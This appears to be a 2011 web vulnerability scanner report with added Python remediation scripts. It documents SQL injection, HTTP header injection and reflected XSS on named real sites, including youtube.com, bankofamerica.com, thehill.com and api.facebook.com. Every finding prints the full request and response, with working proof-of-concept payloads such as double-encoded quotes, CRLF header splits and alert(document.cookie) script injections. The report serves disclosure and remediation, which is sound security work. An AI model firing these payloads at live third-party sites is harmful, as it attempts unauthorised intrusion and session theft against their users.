<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<title>Learning Solutio
...[SNIP]...

1.2. http://www.thestandard.com.hk/news_detail.asp [art_id parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.thestandard.com.hk
Path:   /news_detail.asp

Issue detail

The art_id parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the art_id parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /news_detail.asp?we_cat=4&art_id=107529'&sid=31063765&con_type=1&d_str=20110127&fc=4 HTTP/1.1
Host: www.thestandard.com.hk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Thu, 03 Feb 2011 01:57:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 339
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSSCSSRSQ=CABDPJKADHMKIKHPIDDLPNCO; path=/
Cache-control: private


<html>

<HTML>
<font face="Arial" size=2>
<p>Microsoft OLE DB Provider for ODBC Drivers</font> <font face="Arial" size=2>error '80040e21'</font>
<p>
<font face="Arial" size=2>ODBC driver does no
...[SNIP]...
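The art_id finding above is the classic pattern of a numeric identifier concatenated into a query string. The following script is an added illustration, not code from the report or from thestandard.com.hk: it reproduces the pattern against an in-memory SQLite database (the table, column names and row contents are made up for the demo) and places the parameterised form beside it, so the same three inputs can be compared: a normal id, the scanner's trailing single quote, and a boolean injection.

```python
import sqlite3

# Constructed sample rows; table, column and titles are assumptions for the demo.
ROWS = [(107529, "News bites: tuna dispute"), (107530, "Second story")]


def setup_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (art_id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO news VALUES (?, ?)", ROWS)
    return conn


def lookup_concatenated(conn, art_id):
    """Vulnerable: the raw parameter becomes part of the SQL text, which is what
    the ASP page appears to do. A stray quote breaks the statement (the 500 with
    an OLE DB error in the report), and '0 OR 1=1' rewrites the WHERE clause."""
    sql = "SELECT title FROM news WHERE art_id = %s ORDER BY art_id" % art_id
    return [row[0] for row in conn.execute(sql)]


def lookup_parameterised(conn, art_id):
    """Fixed: allow-list the value as a decimal integer, then bind it so the
    database only ever sees it as data, never as SQL."""
    if not art_id.isdigit():
        raise ValueError("art_id must be a decimal integer")
    rows = conn.execute(
        "SELECT title FROM news WHERE art_id = ? ORDER BY art_id", (int(art_id),)
    )
    return [row[0] for row in rows]


def probe(art_id):
    """Run both lookups on one input. Returns (concat_result, param_result):
    a list of titles, the string 'error' if the SQL statement failed, or
    'rejected' if input validation refused the value."""
    conn = setup_db()
    try:
        concat = lookup_concatenated(conn, art_id)
    except sqlite3.OperationalError:
        concat = "error"
    try:
        param = lookup_parameterised(conn, art_id)
    except ValueError:
        param = "rejected"
    return concat, param


if __name__ == "__main__":
    for value in ("107529", "107529'", "0 OR 1=1"):
        print(repr(value), "->", probe(value))
```

The single quote that the scanner sent is only the detection signal; the third input shows why an error page alone is not a fix, since the concatenated query returns every row without producing any error at all.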

1.3. http://www.youtube.com/ [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.youtube.com
Path:   /

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. Note that both captured responses below return 200 OK and, as far as the excerpts show, differ only in per-visitor cookie values, so the error-message difference the scanner keyed on is not visible in this report; treat the finding as unconfirmed until it is reproduced manually.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

A web server does not URL-decode request header values, so any decoding that turns %2527 in the Referer header into a quote is the application's own, and there is probably no need to perform it at all. In any case, the application should perform its input validation after any custom canonicalisation has been carried out, never before.

Request 1

GET /?q=bluefin+tuna&hl=en&tab=n1 HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%2527

Response 1

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:57:33 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: VISITOR_INFO1_LIVE=m0XBBtAthZY; path=/; domain=.youtube.com; expires=Sat, 01-Oct-2011 01:57:33 GMT
Set-Cookie: PREF=f1=50000000; path=/; domain=.youtube.com; expires=Sun, 31-Jan-2021 01:57:33 GMT
Set-Cookie: GEO=bc7103ce4190df0c025f1e8acab27b75cwsAAAAzR0KtwdbzTUoLjQ==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html lang="en" dir="ltr" >
<!-- machid: nLThsU052OXJEdFhQTnNRNnZmYTRhLTdpdTd2UVBWaGsyWG5nbkZqNmZZcVNDM3RNTEtlWTJ3 -->
<head>
<script>
var yt = yt || {};

yt.timing
...[SNIP]...
<img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" title="Ultimate Caption FAIL, FAIL" data-thumb="//i1.ytimg.com/vi/hVNrkXM3TTI/default.jpg" alt="Thumbnail" class="" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/TOP/Logged_Out/28');" >
...[SNIP]...

Request 2

GET /?q=bluefin+tuna&hl=en&tab=n1 HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%2527%2527

Response 2

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:57:33 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: VISITOR_INFO1_LIVE=7W9y3yp9dBk; path=/; domain=.youtube.com; expires=Sat, 01-Oct-2011 01:57:33 GMT
Set-Cookie: PREF=f1=50000000; path=/; domain=.youtube.com; expires=Sun, 31-Jan-2021 01:57:33 GMT
Set-Cookie: GEO=bc7103ce4190df0c025f1e8acab27b75cwsAAAAzR0KtwdbzTUoLjQ==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html lang="en" dir="ltr" >
<!-- machid: nLThsU052OXJEdFZ1el9MdThWQy1DcWhubzU0LXdXb18zOW5TYkdOeWdFc3dZV1JacW5PM3Bn -->
<head>
<script>
var yt = yt || {};

yt.timing
...[SNIP]...
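The double-encoding bypass described in 1.3 comes down to ordering: a filter that runs between two decode steps sees %27, not a quote. The script below is an added example and not code from the report or from youtube.com; the blocked-token list and the two decode layers are assumptions modelled on the scanner's description, and it shows the broken order beside the corrected one.

```python
from urllib.parse import unquote

# Assumed deny-list of a naive injection filter (illustrative only).
BLOCKED = ("'", '"', ";", "--")


def contains_blocked(value):
    return any(token in value for token in BLOCKED)


def filter_before_second_decode(raw):
    """Broken order: one decode happens, the filter runs, then application code
    decodes a second time. Returns (accepted, value_actually_used)."""
    once = unquote(raw)            # first decode (for a header, the app's own)
    if contains_blocked(once):
        return False, once
    twice = unquote(once)          # extra decode after the check: %2527 -> %27 -> '
    return True, twice


def filter_after_canonicalisation(raw):
    """Fixed order: canonicalise fully first, then validate the final value.
    (Better still is to not decode a second time at all.)"""
    canonical = unquote(unquote(raw))
    if contains_blocked(canonical):
        return False, canonical
    return True, canonical


if __name__ == "__main__":
    for sample in ("q=%2527", "q=%27", "q=bluefin+tuna"):
        print(sample, filter_before_second_decode(sample), filter_after_canonicalisation(sample))
```

With the broken order, %2527 sails through the filter and reaches the database as a bare quote; with the corrected order it is rejected, and a plain value is accepted by both.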

2. HTTP header injection
There are 4 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
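The four findings in this section all reflect a CRLF-bearing value into Location or Set-Cookie. The script below is an added example, not code from the report or from any of the sites named in it: it builds a redirect the unsafe way, parses the result as a client would so the injected header and the split body are visible, and then applies the control-character check described in the remediation. The host name, the hex tags and the payloads are constructed for the demo.

```python
import re

# Constructed payloads modelled on the scanner's probes (tags are arbitrary).
PAYLOAD = "44609\r\n823a43cd739: injected"
SPLIT_PAYLOAD = "44609\r\n\r\n<script>alert(1)</script>"

_CTL = re.compile(r"[\x00-\x1f\x7f]")


def redirect_unsafe(path_segment):
    """Vulnerable: the URL segment is copied straight into Location, CRLF and all."""
    return ("HTTP/1.1 301 Moved Permanently\r\n"
            "Location: http://example.invalid/locator/" + path_segment + "\r\n"
            "Content-Length: 0\r\n\r\n")


def is_header_safe(value):
    """Minimum check from the remediation text: no byte below 0x20 (plus DEL).
    A tighter allow-list such as [A-Za-z0-9_-] is preferable where the field permits."""
    return _CTL.search(value) is None


def redirect_safe(path_segment):
    if not is_header_safe(path_segment):
        raise ValueError("control character in header value")
    return ("HTTP/1.1 301 Moved Permanently\r\n"
            "Location: http://example.invalid/locator/" + path_segment + "\r\n"
            "Content-Length: 0\r\n\r\n")


def parse_headers(raw):
    """Minimal header parser: the (name, value) pairs a client would see."""
    head = raw.split("\r\n\r\n", 1)[0]
    pairs = []
    for line in head.split("\r\n")[1:]:       # skip the status line
        name, _, value = line.partition(":")
        pairs.append((name.strip(), value.strip()))
    return pairs


def body_of(raw):
    """Everything after the first blank line, i.e. what a client treats as the body."""
    return raw.split("\r\n\r\n", 1)[1]


if __name__ == "__main__":
    print(parse_headers(redirect_unsafe(PAYLOAD)))
    print(repr(body_of(redirect_unsafe(SPLIT_PAYLOAD))[:40]))
    print(is_header_safe(PAYLOAD), is_header_safe("44609"))
```

Many current frameworks refuse CR and LF in header values on their own, but the check still belongs in the application, because it also covers 2.1, where the value arrives via a cookie and is echoed back into Set-Cookie.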


2.1. http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload e98b7%0d%0a72138907069 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header. Because the injection point is a cookie rather than a URL parameter, an attacker first needs a way to plant the eyeblaster cookie in the victim's browser (for example through another flaw on a serving-sys.com host), which makes this harder to exploit remotely than 2.2 to 2.4.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2171139&PluID=0&w=728&h=90&ord=[timestamp]&ucm=true HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://thehill.com/blogs/e2-wire/677-e2-wire650aa'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E2295b33377e/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u3=1; C4=; A3=f+JvabEk02WG00002h5iUabNz07l00000Qh5j3abNz07l00000.gn3Ka4JO09MY00001gNfHaaiN0aVX00001fU+La50V0a+r00001fUFGa50V02WG00001gy3.ach00c9M00001cRreabeg03Dk00001gy7La9bU0c9M00003gy5Da9bU0c9M00001gCTVa9bU0c9M00001gvKEacgY0c9M00001ge4Gack+0bM000001ge4Hack+0bM000001; B3=7lgH0000000001sG89PS000000000QsZ89PT000000000.sZ852G0000000003sS7dNH0000000002sZ7GHq0000000001s.7FCH0000000001s.83xP0000000001sF8cVQ0000000001sV852N0000000001s.87ma0000000001s.6o.Q0000000001sY7gi30000000001sG852z0000000001sS852A0000000001sS; eyeblaster=BWVal=408&BWDate=40573.510532&debuglevel=&FLV=10.1103&RES=128&WMPV=0e98b7%0d%0a72138907069; ActivityInfo=000p81bBo%5f; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: eyeblaster=BWVal=408&BWDate=40573.510532&debuglevel=&FLV=10.1103&RES=128&WMPV=0e98b7
72138907069
; expires=Tue, 03-May-2011 20: 57:40 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A3=h5j3abNz07l00000.h5iUabNz07l00000Qf+JvabEk02WG00002gNfHaaiN0aVX00001gn3Ka4JO09MY00001fU+La50V0a+r00001gYx+adwF0cvM00001fUFGa50V02WG00001gy3.ach00c9M00001cRreabeg03Dk00001gy7La9bU0c9M00003gCTVa9bU0c9M00001gy5Da9bU0c9M00001gvKEacgY0c9M00001ge4Gack+0bM000001ge4Hack+0bM000001; expires=Tue, 03-May-2011 20:57:40 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=89PS000000000QsZ7lgH0000000001sG89PT000000000.sZ852G0000000003sS7dNH0000000002sZ7GHq0000000001s.7FCH0000000001s.8cVQ0000000001sV83xP0000000001sF852N0000000001s.6o.Q0000000001sY87ma0000000001s.8i430000000001t27gi30000000001sG852z0000000001sS852A0000000001sS; expires=Tue, 03-May-2011 20:57:40 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Tue, 03-May-2011 20:57:40 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Thu, 03 Feb 2011 01:57:39 GMT
Connection: close
Content-Length: 1696

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

2.2. http://locators.bankofamerica.com/locator/locator/LocatorAction.do [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/LocatorAction.do

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 44609%0d%0a823a43cd739 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/44609%0d%0a823a43cd739 HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 02 Feb 2011 22:10:48 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26
Set-Cookie: JSESSIONID=6B551B6EF292368753CEA0B23B3B8F3A.ftb-web4; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/44609
823a43cd739
?shouldTest=true
Content-Language: en-US
Content-Length: 0
Connection: close
Content-Type: text/plain


2.3. http://www.fis.com/fis/worldnews/worldnews.asp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fis.com
Path:   /fis/worldnews/worldnews.asp

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 49dfd%0d%0ab7061f6f456 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /49dfd%0d%0ab7061f6f456/worldnews/worldnews.asp HTTP/1.1
Host: www.fis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Server: Microsoft-IIS/5.0
Date: Thu, 03 Feb 2011 01:52:12 GMT
Connection: close
Location: /fis/error/error.asp?404;http://www.fis.com/49dfd
b7061f6f456
/worldnews/worldnews.asp


2.4. http://www.fis.com/fis/worldnews/worldnews.asp [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fis.com
Path:   /fis/worldnews/worldnews.asp

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload d412c%0d%0ad95cbc5e854 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /fis/d412c%0d%0ad95cbc5e854/worldnews.asp HTTP/1.1
Host: www.fis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Server: Microsoft-IIS/5.0
Date: Thu, 03 Feb 2011 01:52:17 GMT
Connection: close
Location: /fis/error/error.asp?404;http://www.fis.com/fis/d412c
d95cbc5e854
/worldnews.asp


3. Cross-site scripting (reflected)
There are 182 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses: input should be validated as strictly as possible on arrival, and user input should be encoded for the exact context it is inserted into (HTML entity encoding between tags and in attributes, JavaScript string escaping inside script literals) at the point where it is copied into the response. In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
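Context-specific encoding is the part of the remediation that scanners cannot show, so here is an added example (not code from the report or from any site it names) covering the three output contexts that occur in the findings that follow: text between tags, a JavaScript string literal, and the unquoted JavaScript expression of 3.1 and 3.2, where no encoding exists and only validation helps. The function names and the surrounding markup are assumptions for the demo.

```python
import html
import json
import re


def render_text(user):
    """HTML text context (the 'between tags' findings): entity-encode everything."""
    return "<p>" + html.escape(user, quote=True) + "</p>"


def js_string_literal(user):
    """JavaScript string context: json.dumps yields a double-quoted, escaped literal
    (ensure_ascii=True also escapes U+2028/U+2029). '</' is escaped as well so the
    literal can never close an enclosing <script> element."""
    return json.dumps(user).replace("</", "<\\/")


def render_js_string(user):
    return "<script>var v = " + js_string_literal(user) + ";</script>"


def render_js_number(user):
    """Unquoted JS expression, as in al.php's shifth/shiftv: the only safe option
    is to validate the value as a small integer and emit the parsed number."""
    if not re.fullmatch(r"-?\d{1,6}", user):
        raise ValueError("expected a small integer")
    return ("<script>c.left = parseInt(sl + (iw - 306) / 2 + "
            + str(int(user)) + ");</script>")


if __name__ == "__main__":
    print(render_text("<img src=a onerror=alert(1)>"))
    print(render_js_string("x';alert(1)//"))
    print(render_js_string("</script><script>alert(1)</script>"))
    print(render_js_number("0"))
    try:
        render_js_number("066993;alert(1)//766c94fef6e")
    except ValueError as exc:
        print("rejected:", exc)
```

Note that the JavaScript-string encoding does not neutralise a value that is later written into the DOM as HTML; each hop gets its own encoding for its own context.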


3.1. http://ad.thehill.com/www/delivery/al.php [shifth parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.thehill.com
Path:   /www/delivery/al.php

Issue detail

The value of the shifth request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 66993%3balert(1)//766c94fef6e was submitted in the shifth parameter. This input was echoed as 66993;alert(1)//766c94fef6e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Here the value is a pixel offset, so the fix is straightforward: parse shifth as an integer on the server and emit only the resulting number, rejecting anything that does not match a strict numeric pattern.

Request

GET /www/delivery/al.php?zoneid=113&cb=INSERT_RANDOM_NUMBER_HERE&layerstyle=simple&align=center&valign=middle&padding=2&closetime=8&padding=2&shifth=066993%3balert(1)//766c94fef6e&shiftv=0&closebutton=t&backcolor=FFFFFF&bordercolor=000000 HTTP/1.1
Host: ad.thehill.com
Proxy-Connection: keep-alive
Referer: http://thehill.com/blogs/e2-wire/677-e2-wire650aa'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E2295b33377e/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=308f74733f72a0ba99b5c2e36e2aaec4

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.1.6
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Date: Thu, 03 Feb 2011 01:32:17 GMT
Content-type: application/x-javascript
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=308f74733f72a0ba99b5c2e36e2aaec4; expires=Fri, 03-Feb-2012 01:32:17 GMT; path=/
Server: lighttpd/1.4.22
Content-Length: 4484

var MAX_b295a9fa = '';
MAX_b295a9fa += "<"+"div id=\"MAX_b295a9fa\" style=\"position:absolute; width:306px; height:267px; z-index:99; left: 0px; top: 0px; visibility: hidden\">\n";
MAX_b295a9fa += "<"
...[SNIP]...
cumentElement.scrollTop;
       of = 0;
   }
   else
   {
       sl = window.pageXOffset;
       st = window.pageYOffset;

       if (window.opera)
           of = 0;
       else
           of = 16;
   }

        c[_s].left = parseInt(sl+(iw - 306) / 2 +066993;alert(1)//766c94fef6e) + (window.opera?'':'px');
        c[_s].top = parseInt(st+(ih - 267) / 2 +0) + (window.opera?'':'px');

   c[_s].visibility = MAX_adlayers_visible_b295a9fa;
}


function MAX_simplepop_b295a9fa(what)
{
   var
...[SNIP]...

3.2. http://ad.thehill.com/www/delivery/al.php [shiftv parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.thehill.com
Path:   /www/delivery/al.php

Issue detail

The value of the shiftv request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 7de03%3balert(1)//1688d5789ce was submitted in the shiftv parameter. This input was echoed as 7de03;alert(1)//1688d5789ce in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. As with shifth in 3.1, shiftv is a pixel offset and should be parsed as an integer server-side, with anything non-numeric rejected.

Request

GET /www/delivery/al.php?zoneid=113&cb=INSERT_RANDOM_NUMBER_HERE&layerstyle=simple&align=center&valign=middle&padding=2&closetime=8&padding=2&shifth=0&shiftv=07de03%3balert(1)//1688d5789ce&closebutton=t&backcolor=FFFFFF&bordercolor=000000 HTTP/1.1
Host: ad.thehill.com
Proxy-Connection: keep-alive
Referer: http://thehill.com/blogs/e2-wire/677-e2-wire650aa'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E2295b33377e/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=308f74733f72a0ba99b5c2e36e2aaec4

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.1.6
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Date: Thu, 03 Feb 2011 01:32:12 GMT
Content-type: application/x-javascript
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=308f74733f72a0ba99b5c2e36e2aaec4; expires=Fri, 03-Feb-2012 01:32:12 GMT; path=/
Server: lighttpd/1.4.22
Content-Length: 4484

var MAX_fedee667 = '';
MAX_fedee667 += "<"+"div id=\"MAX_fedee667\" style=\"position:absolute; width:306px; height:267px; z-index:99; left: 0px; top: 0px; visibility: hidden\">\n";
MAX_fedee667 += "<"
...[SNIP]...
;
       st = window.pageYOffset;

       if (window.opera)
           of = 0;
       else
           of = 16;
   }

        c[_s].left = parseInt(sl+(iw - 306) / 2 +0) + (window.opera?'':'px');
        c[_s].top = parseInt(st+(ih - 267) / 2 +07de03;alert(1)//1688d5789ce) + (window.opera?'':'px');

   c[_s].visibility = MAX_adlayers_visible_fedee667;
}


function MAX_simplepop_fedee667(what)
{
   var c = MAX_findObj('MAX_fedee667');

   if (!c)
       return false;

   if (c.style
...[SNIP]...

3.3. http://api.facebook.com/restserver.php [method parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The value of the method request parameter is copied unencoded into the response body. The payload 6c818<img%20src%3da%20onerror%3dalert(1)>15cd25761cc was submitted in the method parameter. This input was echoed as 6c818<img src=a onerror=alert(1)>15cd25761cc in the application's response. Note that the response is served as text/javascript and the reflected value sits inside a JSON string within a JSONP callback, so the injected tag only runs if a browser renders the response as HTML (for example through content-type sniffing); confirm that before accepting the High rating.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /restserver.php?v=1.0&method=links.getStats6c818<img%20src%3da%20onerror%3dalert(1)>15cd25761cc&urls=%5B%22http%3A%2F%2Fnews.change.org%2Fstories%2Fnobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi%23share_source%3Dblog-top_fb%22%5D&format=json&callback=fb_sharepro_render HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://news.change.org/stories/nobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi?7bf2b%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E36bc7e08caf=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; datr=8CJHTYhjyotVYfKpZ5B35lnF

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Type: text/javascript;charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Cnection: close
Date: Thu, 03 Feb 2011 01:33:00 GMT
Content-Length: 427

